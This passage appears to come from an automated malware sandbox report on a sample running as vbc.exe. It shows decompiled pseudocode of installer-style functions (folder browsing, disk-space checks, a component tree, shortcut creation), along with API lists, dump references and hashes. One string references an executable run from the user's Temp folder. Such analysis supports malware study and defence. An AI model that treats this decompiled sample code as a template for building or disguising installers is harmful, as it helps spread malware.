          					L8:
          					if(_a8 != 0x111) {
          						L20:
          						if(_a8 == 0x40f) {
          							L22:
          							_v8 = _v8 & 0x00000000;
          							_v12 = _v12 & 0x00000000;
          							E00405CB2(0x3fb, _t146);
          							if(E00406045(_t186, _t146) == 0) {
          								_v8 = 1;
          							}
          							E0040666E(0x79ff58, _t146);
          							_t87 = E00406A3B(1);
          							_v16 = _t87;
          							if(_t87 == 0) {
          								L30:
          								E0040666E(0x79ff58, _t146);
          								_t89 = E00405FE8(0x79ff58);
          								_t158 = 0;
          								if(_t89 != 0) {
          									 *_t89 = 0;
          								}
          								if(GetDiskFreeSpaceW(0x79ff58,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
          									goto L35;
          								} else {
          									_t169 = 0x400;
          									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
          									asm("cdq");
          									_v48 = _t109;
          									_v44 = _t156;
          									_v12 = 1;
          									goto L36;
          								}
          							} else {
          								_t159 = 0;
          								if(0 == 0x79ff58) {
          									goto L30;
          								} else {
          									goto L26;
          								}
          								while(1) {
          									L26:
          									_t114 = _v16(0x79ff58,  &_v48,  &_v28,  &_v40);
          									if(_t114 != 0) {
          										break;
          									}
          									if(_t159 != 0) {
          										 *_t159 =  *_t159 & _t114;
          									}
          									_t160 = E00405F89(0x79ff58);
          									 *_t160 =  *_t160 & 0x00000000;
          									_t159 = _t160;
          									 *_t159 = 0x5c;
          									if(_t159 != 0x79ff58) {
          										continue;
          									} else {
          										goto L30;
          									}
          								}
          								_t150 = _v44;
          								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
          								_v44 = _t150 >> 0xa;
          								_v12 = 1;
          								_t158 = 0;
          								__eflags = 0;
          								L35:
          								_t169 = 0x400;
          								L36:
          								_t95 = E00404F58(5);
          								if(_v12 != _t158) {
          									_t197 = _v44;
          									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
          										_v8 = 2;
          									}
          								}
          								if( *((intOrPtr*)( *0x7a7a7c + 0x10)) != _t158) {
          									E00404F40(0x3ff, 0xfffffffb, _t95);
          									if(_v12 == _t158) {
          										SetDlgItemTextW(_a4, _t169, 0x79ff48);
          									} else {
          										E00404E77(_t169, 0xfffffffc, _v48, _v44);
          									}
          								}
          								_t96 = _v8;
          								 *0x7a8b44 = _t96;
          								if(_t96 == _t158) {
          									_v8 = E0040140B(7);
          								}
          								if(( *(_v32 + 0x14) & _t169) != 0) {
          									_v8 = _t158;
          								}
          								E004045EC(0 | _v8 == _t158);
          								if(_v8 == _t158 &&  *0x7a1f78 == _t158) {
          									E00404A14();
          								}
          								 *0x7a1f78 = _t158;
          								goto L53;
          							}
          						}
          						_t186 = _a8 - 0x405;
          						if(_a8 != 0x405) {
          							goto L53;
          						}
          						goto L22;
          					}
          					_t118 = _a12 & 0x0000ffff;
          					if(_t118 != 0x3fb) {
          						L12:
          						if(_t118 == 0x3e9) {
          							_t152 = 7;
          							memset( &_v76, 0, _t152 << 2);
          							_v80 = _t167;
          							_v72 = 0x7a1f88;
          							_v60 = E00404E11;
          							_v56 = _t146;
          							_v68 = E004066AB(_t146, 0x7a1f88, _t167, 0x7a0760, _v12);
          							_t122 =  &_v80;
          							_v64 = 0x41;
          							__imp__SHBrowseForFolderW(_t122);
          							if(_t122 == 0) {
          								_a8 = 0x40f;
          							} else {
          								__imp__CoTaskMemFree(_t122);
          								E00405F3D(_t146);
          								_t125 =  *((intOrPtr*)( *0x7a8ab0 + 0x11c));
          								if( *((intOrPtr*)( *0x7a8ab0 + 0x11c)) != 0 && _t146 == 0x7b3800) {
          									E004066AB(_t146, 0x7a1f88, _t167, 0, _t125);
          									if(lstrcmpiW(0x7a6a40, 0x7a1f88) != 0) {
          										lstrcatW(_t146, 0x7a6a40);
          									}
          								}
          								 *0x7a1f78 =  *0x7a1f78 + 1;
          								SetDlgItemTextW(_t167, 0x3fb, _t146);
          							}
          						}
          						goto L20;
          					}
          					if(_a12 >> 0x10 != 0x300) {
          						goto L53;
          					}
          					_a8 = 0x40f;
          					goto L12;
          				} else {
          					_t166 = GetDlgItem(_t167, 0x3fb);
          					if(E00405FB4(_t146) != 0 && E00405FE8(_t146) == 0) {
          						E00405F3D(_t146);
          					}
          					 *0x7a7a78 = _t167;
          					SetWindowTextW(_t166, _t146);
          					_push( *((intOrPtr*)(_a16 + 0x34)));
          					_push(1);
          					E004045CA(_t167);
          					_push( *((intOrPtr*)(_a16 + 0x30)));
          					_push(0x14);
          					E004045CA(_t167);
          					E004045FF(_t166);
          					_t138 = E00406A3B(8);
          					if(_t138 == 0) {
          						L53:
          						return E00404631(_a8, _a12, _a16);
          					} else {
          						 *_t138(_t166, 1);
          						goto L8;
          					}
          				}
          			}













































          0x00404abb
          0x00404ac1
          0x00404ac7
          0x00404ad4
          0x00404ae2
          0x00404ae5
          0x00404aed
          0x00404af3
          0x00404af3
          0x00404aff
          0x00404b02
          0x00404b70
          0x00404b77
          0x00404c4e
          0x00404c55
          0x00404c64
          0x00404c64
          0x00404c68
          0x00404c72
          0x00404c7f
          0x00404c81
          0x00404c81
          0x00404c8f
          0x00404c96
          0x00404c9d
          0x00404ca0
          0x00404cdc
          0x00404cde
          0x00404ce4
          0x00404ce9
          0x00404ced
          0x00404cef
          0x00404cef
          0x00404d0b
          0x00000000
          0x00404d0d
          0x00404d10
          0x00404d1e
          0x00404d24
          0x00404d25
          0x00404d28
          0x00404d2b
          0x00000000
          0x00404d2b
          0x00404ca2
          0x00404ca4
          0x00404ca8
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x00404caa
          0x00404caa
          0x00404cb7
          0x00404cbc
          0x00000000
          0x00000000
          0x00404cc0
          0x00404cc2
          0x00404cc2
          0x00404ccb
          0x00404ccd
          0x00404cd2
          0x00404cd5
          0x00404cda
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x00404cda
          0x00404d37
          0x00404d41
          0x00404d44
          0x00404d47
          0x00404d4e
          0x00404d4e
          0x00404d50
          0x00404d50
          0x00404d55
          0x00404d57
          0x00404d5f
          0x00404d66
          0x00404d68
          0x00404d73
          0x00404d73
          0x00404d68
          0x00404d83
          0x00404d8d
          0x00404d95
          0x00404db0
          0x00404d97
          0x00404da0
          0x00404da0
          0x00404d95
          0x00404db5
          0x00404dba
          0x00404dbf
          0x00404dc8
          0x00404dc8
          0x00404dd1
          0x00404dd3
          0x00404dd3
          0x00404ddf
          0x00404de7
          0x00404df1
          0x00404df1
          0x00404df6
          0x00000000
          0x00404df6
          0x00404ca0
          0x00404c57
          0x00404c5e
          0x00000000
          0x00000000
          0x00000000
          0x00404c5e
          0x00404b7d
          0x00404b86
          0x00404ba0
          0x00404ba5
          0x00404baf
          0x00404bb6
          0x00404bc2
          0x00404bc5
          0x00404bc8
          0x00404bcf
          0x00404bd7
          0x00404bda
          0x00404bde
          0x00404be5
          0x00404bed
          0x00404c47
          0x00404bef
          0x00404bf0
          0x00404bf7
          0x00404c01
          0x00404c09
          0x00404c16
          0x00404c2a
          0x00404c2e
          0x00404c2e
          0x00404c2a
          0x00404c33
          0x00404c40
          0x00404c40
          0x00404bed
          0x00000000
          0x00404ba5
          0x00404b93
          0x00000000
          0x00000000
          0x00404b99
          0x00000000
          0x00404b04
          0x00404b11
          0x00404b1a
          0x00404b27
          0x00404b27
          0x00404b2e
          0x00404b34
          0x00404b3d
          0x00404b40
          0x00404b43
          0x00404b4b
          0x00404b4e
          0x00404b51
          0x00404b57
          0x00404b5e
          0x00404b65
          0x00404dfc
          0x00404e0e
          0x00404b6b
          0x00404b6e
          0x00000000
          0x00404b6e
          0x00404b65

          APIs
          • GetDlgItem.USER32(?,000003FB), ref: 00404B0A
          • SetWindowTextW.USER32 ref: 00404B34
          • SHBrowseForFolderW.SHELL32(?), ref: 00404BE5
          • CoTaskMemFree.OLE32(00000000), ref: 00404BF0
          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab,007A1F88,00000000,?,?), ref: 00404C22
          • lstrcatW.KERNEL32 ref: 00404C2E
          • SetDlgItemTextW.USER32 ref: 00404C40
            • Part of subcall function 00405CB2: GetDlgItemTextW.USER32 ref: 00405CC5
            • Part of subcall function 004068F5: CharNextW.USER32(?), ref: 00406958
            • Part of subcall function 004068F5: CharNextW.USER32(?), ref: 00406967
            • Part of subcall function 004068F5: CharNextW.USER32(?), ref: 0040696C
            • Part of subcall function 004068F5: CharPrevW.USER32(?,?), ref: 0040697F
          • GetDiskFreeSpaceW.KERNEL32(0079FF58,?,?,0000040F,?,0079FF58,0079FF58,?,00000001,0079FF58,?,?,000003FB,?), ref: 00404D03
          • MulDiv.KERNEL32 ref: 00404D1E
            • Part of subcall function 00404E77: lstrlenW.KERNEL32(007A1F88,007A1F88,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F18
            • Part of subcall function 00404E77: wsprintfW.USER32 ref: 00404F21
            • Part of subcall function 00404E77: SetDlgItemTextW.USER32 ref: 00404F34
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
          • String ID: A$C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab
          • API String ID: 2624150263-684180660
          • Opcode ID: 1c3e24ea3c91ff4ce813832bee9d1a6c89b271b1ee61e594e0d9cbeb6062d674
          • Instruction ID: 4ef08ca0e285fb36132dd1072a135484aded6f5102cec428142970bb06395e88
          • Opcode Fuzzy Hash: 1c3e24ea3c91ff4ce813832bee9d1a6c89b271b1ee61e594e0d9cbeb6062d674
          • Instruction Fuzzy Hash: 77A182B1901209ABEB11AFA5CD45AEF77B9EF84314F11803BF601B62D1DB7C89418B69
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 67%
          			E004021AA() {
          				signed int _t52;
          				void* _t56;
          				intOrPtr* _t60;
          				intOrPtr _t61;
          				intOrPtr* _t62;
          				intOrPtr* _t64;
          				intOrPtr* _t66;
          				intOrPtr* _t68;
          				intOrPtr* _t70;
          				intOrPtr* _t72;
          				intOrPtr* _t74;
          				intOrPtr* _t76;
          				intOrPtr* _t78;
          				intOrPtr* _t80;
          				void* _t83;
          				intOrPtr* _t91;
          				signed int _t101;
          				signed int _t105;
          				void* _t107;
          
          				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
          				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
          				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
          				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
          				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
          				_t52 =  *(_t107 - 0x20);
          				 *(_t107 - 0x50) = _t52 & 0x00000fff;
          				_t101 = _t52 & 0x00008000;
          				_t105 = _t52 >> 0x0000000c & 0x00000007;
          				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
          				if(E00405FB4( *((intOrPtr*)(_t107 - 0x44))) == 0) {
          					E00402DA6(0x21);
          				}
          				_t56 = _t107 + 8;
          				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
          				if(_t56 < _t83) {
          					L14:
          					 *((intOrPtr*)(_t107 - 4)) = 1;
          					_push(0xfffffff0);
          				} else {
          					_t60 =  *((intOrPtr*)(_t107 + 8));
          					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
          					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
          					if(_t61 >= _t83) {
          						_t64 =  *((intOrPtr*)(_t107 + 8));
          						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
          						if(_t101 == _t83) {
          							_t80 =  *((intOrPtr*)(_t107 + 8));
          							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x7b4000);
          						}
          						if(_t105 != _t83) {
          							_t78 =  *((intOrPtr*)(_t107 + 8));
          							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
          						}
          						_t66 =  *((intOrPtr*)(_t107 + 8));
          						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
          						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
          						if( *_t91 != _t83) {
          							_t76 =  *((intOrPtr*)(_t107 + 8));
          							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
          						}
          						_t68 =  *((intOrPtr*)(_t107 + 8));
          						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
          						_t70 =  *((intOrPtr*)(_t107 + 8));
          						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
          						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
          							_t74 =  *((intOrPtr*)(_t107 - 0x38));
          							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
          						}
          						_t72 =  *((intOrPtr*)(_t107 - 0x38));
          						 *((intOrPtr*)( *_t72 + 8))(_t72);
          					}
          					_t62 =  *((intOrPtr*)(_t107 + 8));
          					 *((intOrPtr*)( *_t62 + 8))(_t62);
          					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
          						_push(0xfffffff4);
          					} else {
          						goto L14;
          					}
          				}
          				E00401423();
          				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t107 - 4));
          				return 0;
          			}






















          0x004021b3
          0x004021bd
          0x004021c7
          0x004021d1
          0x004021dc
          0x004021df
          0x004021f9
          0x004021fc
          0x00402202
          0x00402205
          0x0040220f
          0x00402213
          0x00402213
          0x00402218
          0x00402229
          0x00402231
          0x004022e8
          0x004022e8
          0x004022ef
          0x00402237
          0x00402237
          0x00402246
          0x0040224a
          0x0040224d
          0x00402253
          0x00402261
          0x00402264
          0x00402266
          0x00402271
          0x00402271
          0x00402276
          0x00402278
          0x0040227f
          0x0040227f
          0x00402282
          0x0040228b
          0x0040228e
          0x00402294
          0x00402296
          0x004022a0
          0x004022a0
          0x004022a3
          0x004022ac
          0x004022af
          0x004022b8
          0x004022be
          0x004022c0
          0x004022ce
          0x004022ce
          0x004022d1
          0x004022d7
          0x004022d7
          0x004022da
          0x004022e0
          0x004022e6
          0x004022fb
          0x00000000
          0x00000000
          0x00000000
          0x004022e6
          0x004022f1
          0x00402c2d
          0x00402c39

          APIs
          • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?), ref: 00402229
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: CreateInstance
          • String ID:
          • API String ID: 542301482-0
          • Opcode ID: 95206bf645e1c446277479694b40913283949515a1362953c4f2174f782b348b
          • Instruction ID: c9e7058f2ccac2017f9d88f2873359e197591af4de9cbf84fabb751e216ccc72
          • Opcode Fuzzy Hash: 95206bf645e1c446277479694b40913283949515a1362953c4f2174f782b348b
          • Instruction Fuzzy Hash: A1411571A00209EFCF40DFE4C989E9D7BB5BF49304B2045AAF505EB2D1DB799981CB94
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 39%
          			E0040290B(short __ebx, short* __edi) {
          				void* _t21;
          
          				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
          					E004065B5( *((intOrPtr*)(_t21 - 0xc)), _t8);
          					_push(_t21 - 0x2b0);
          					_push(__edi);
          					E0040666E();
          				} else {
          					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
          					 *__edi = __ebx;
          					 *((intOrPtr*)(_t21 - 4)) = 1;
          				}
          				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t21 - 4));
          				return 0;
          			}




          0x00402923
          0x0040293e
          0x00402949
          0x0040294a
          0x00402a94
          0x00402925
          0x00402928
          0x0040292b
          0x0040292e
          0x0040292e
          0x00402c2d
          0x00402c39

          APIs
          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: FileFindFirst
          • String ID:
          • API String ID: 1974802433-0
          • Opcode ID: 886e1da82f87bd9a052d385c947725ec3f25a605ee36621127924a1c8a89904e
          • Instruction ID: 9ced82c77f1422a0303d0e50afa4302c42ae01a582b6fde34da312f05d76664a
          • Opcode Fuzzy Hash: 886e1da82f87bd9a052d385c947725ec3f25a605ee36621127924a1c8a89904e
          • Instruction Fuzzy Hash: 5CF05E71904104EAD701DBA4E949AAEB378EF15314F20457BE101F21D0EBB88E119B29
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 96%
          			E00405037(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
          				struct HWND__* _v8;
          				struct HWND__* _v12;
          				long _v16;
          				signed int _v20;
          				signed int _v24;
          				intOrPtr _v28;
          				signed char* _v32;
          				int _v36;
          				signed int _v44;
          				int _v48;
          				signed int* _v60;
          				signed char* _v64;
          				signed int _v68;
          				long _v72;
          				void* _v76;
          				intOrPtr _v80;
          				intOrPtr _v84;
          				void* _v88;
          				void* __ebx;
          				void* __edi;
          				void* __esi;
          				signed int _t198;
          				intOrPtr _t201;
          				long _t207;
          				signed int _t211;
          				signed int _t222;
          				void* _t225;
          				void* _t226;
          				int _t232;
          				long _t237;
          				long _t238;
          				signed int _t239;
          				signed int _t245;
          				signed int _t247;
          				signed char _t248;
          				signed char _t254;
          				void* _t258;
          				void* _t260;
          				signed char* _t278;
          				signed char _t279;
          				long _t284;
          				struct HWND__* _t291;
          				signed int* _t292;
          				int _t293;
          				long _t294;
          				signed int _t295;
          				void* _t297;
          				long _t298;
          				int _t299;
          				signed int _t300;
          				signed int _t303;
          				signed int _t311;
          				signed char* _t319;
          				int _t324;
          				void* _t326;
          
          				_t291 = _a4;
          				_v12 = GetDlgItem(_t291, 0x3f9);
          				_v8 = GetDlgItem(_t291, 0x408);
          				_t326 = SendMessageW;
          				_v24 =  *0x7a8ac8;
          				_v28 =  *0x7a8ab0 + 0x94;
          				if(_a8 != 0x110) {
          					L23:
          					if(_a8 != 0x405) {
          						_t301 = _a16;
          					} else {
          						_a12 = 0;
          						_t301 = 1;
          						_a8 = 0x40f;
          						_a16 = 1;
          					}
          					if(_a8 == 0x4e || _a8 == 0x413) {
          						_v16 = _t301;
          						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
          							if(( *0x7a8ab9 & 0x00000002) != 0) {
          								L41:
          								if(_v16 != 0) {
          									_t237 = _v16;
          									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
          										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
          									}
          									_t238 = _v16;
          									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
          										_t301 = _v24;
          										_t239 =  *(_t238 + 0x5c);
          										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
          											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
          										} else {
          											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
          										}
          									}
          								}
          								goto L48;
          							}
          							if(_a8 == 0x413) {
          								L33:
          								_t301 = 0 | _a8 != 0x00000413;
          								_t245 = E00404F85(_v8, _a8 != 0x413);
          								_t295 = _t245;
          								if(_t295 >= 0) {
          									_t94 = _v24 + 8; // 0x8
          									_t301 = _t245 * 0x818 + _t94;
          									_t247 =  *_t301;
          									if((_t247 & 0x00000010) == 0) {
          										if((_t247 & 0x00000040) == 0) {
          											_t248 = _t247 ^ 0x00000001;
          										} else {
          											_t254 = _t247 ^ 0x00000080;
          											if(_t254 >= 0) {
          												_t248 = _t254 & 0x000000fe;
          											} else {
          												_t248 = _t254 | 0x00000001;
          											}
          										}
          										 *_t301 = _t248;
          										E0040117D(_t295);
          										_a12 = _t295 + 1;
          										_a16 =  !( *0x7a8ab8) >> 0x00000008 & 0x00000001;
          										_a8 = 0x40f;
          									}
          								}
          								goto L41;
          							}
          							_t301 = _a16;
          							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
          								goto L41;
          							}
          							goto L33;
          						} else {
          							goto L48;
          						}
          					} else {
          						L48:
          						if(_a8 != 0x111) {
          							L56:
          							if(_a8 == 0x200) {
          								SendMessageW(_v8, 0x200, 0, 0);
          							}
          							if(_a8 == 0x40b) {
          								_t225 =  *0x7a1f6c;
          								if(_t225 != 0) {
          									ImageList_Destroy(_t225);
          								}
          								_t226 =  *0x7a1f80;
          								if(_t226 != 0) {
          									GlobalFree(_t226);
          								}
          								 *0x7a1f6c = 0;
          								 *0x7a1f80 = 0;
          								 *0x7a8b00 = 0;
          							}
          							if(_a8 != 0x40f) {
          								L90:
          								if(_a8 == 0x420 && ( *0x7a8ab9 & 0x00000001) != 0) {
          									_t324 = (0 | _a16 == 0x00000020) << 3;
          									ShowWindow(_v8, _t324);
          									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
          								}
          								goto L93;
          							} else {
          								E004011EF(_t301, 0, 0);
          								_t198 = _a12;
          								if(_t198 != 0) {
          									if(_t198 != 0xffffffff) {
          										_t198 = _t198 - 1;
          									}
          									_push(_t198);
          									_push(8);
          									E00405005();
          								}
          								if(_a16 == 0) {
          									L75:
          									E004011EF(_t301, 0, 0);
          									_v36 =  *0x7a1f80;
          									_t201 =  *0x7a8ac8;
          									_v64 = 0xf030;
          									_v24 = 0;
          									if( *0x7a8acc <= 0) {
          										L86:
          										if( *0x7a8b5e == 0x400) {
          											InvalidateRect(_v8, 0, 1);
          										}
          										if( *((intOrPtr*)( *0x7a7a7c + 0x10)) != 0) {
          											E00404F40(0x3ff, 0xfffffffb, E00404F58(5));
          										}
          										goto L90;
          									}
          									_t292 = _t201 + 8;
          									do {
          										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
          										if(_t207 != 0) {
          											_t303 =  *_t292;
          											_v72 = _t207;
          											_v76 = 8;
          											if((_t303 & 0x00000001) != 0) {
          												_v76 = 9;
          												_v60 =  &(_t292[4]);
          												_t292[0] = _t292[0] & 0x000000fe;
          											}
          											if((_t303 & 0x00000040) == 0) {
          												_t211 = (_t303 & 0x00000001) + 1;
          												if((_t303 & 0x00000010) != 0) {
          													_t211 = _t211 + 3;
          												}
          											} else {
          												_t211 = 3;
          											}
          											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
          											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
          											SendMessageW(_v8, 0x113f, 0,  &_v76);
          										}
          										_v24 = _v24 + 1;
          										_t292 =  &(_t292[0x206]);
          									} while (_v24 <  *0x7a8acc);
          									goto L86;
          								} else {
          									_t293 = E004012E2( *0x7a1f80);
          									E00401299(_t293);
          									_t222 = 0;
          									_t301 = 0;
          									if(_t293 <= 0) {
          										L74:
          										SendMessageW(_v12, 0x14e, _t301, 0);
          										_a16 = _t293;
          										_a8 = 0x420;
          										goto L75;
          									} else {
          										goto L71;
          									}
          									do {
          										L71:
          										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
          											_t301 = _t301 + 1;
          										}
          										_t222 = _t222 + 1;
          									} while (_t222 < _t293);
          									goto L74;
          								}
          							}
          						}
          						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
          							goto L93;
          						} else {
          							_t232 = SendMessageW(_v12, 0x147, 0, 0);
          							if(_t232 == 0xffffffff) {
          								goto L93;
          							}
          							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
          							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
          								_t294 = 0x20;
          							}
          							E00401299(_t294);
          							SendMessageW(_a4, 0x420, 0, _t294);
          							_a12 = _a12 | 0xffffffff;
          							_a16 = 0;
          							_a8 = 0x40f;
          							goto L56;
          						}
          					}
          				} else {
          					_v36 = 0;
          					_v20 = 2;
          					 *0x7a8b00 = _t291;
          					 *0x7a1f80 = GlobalAlloc(0x40,  *0x7a8acc << 2);
          					_t258 = LoadImageW( *0x7a8aa0, 0x6e, 0, 0, 0, 0);
          					 *0x7a1f74 =  *0x7a1f74 | 0xffffffff;
          					_t297 = _t258;
          					 *0x7a1f7c = SetWindowLongW(_v8, 0xfffffffc, E00405644);
          					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
          					 *0x7a1f6c = _t260;
          					ImageList_AddMasked(_t260, _t297, 0xff00ff);
          					SendMessageW(_v8, 0x1109, 2,  *0x7a1f6c);
          					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
          						SendMessageW(_v8, 0x111b, 0x10, 0);
          					}
          					DeleteObject(_t297);
          					_t298 = 0;
          					do {
          						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
          						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
          							if(_t298 != 0x20) {
          								_v20 = 0;
          							}
          							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066AB(_t298, 0, _t326, 0, _t266)), _t298);
          						}
          						_t298 = _t298 + 1;
          					} while (_t298 < 0x21);
          					_t299 = _a16;
          					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
          					_push(0x15);
          					E004045CA(_a4);
          					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
          					_push(0x16);
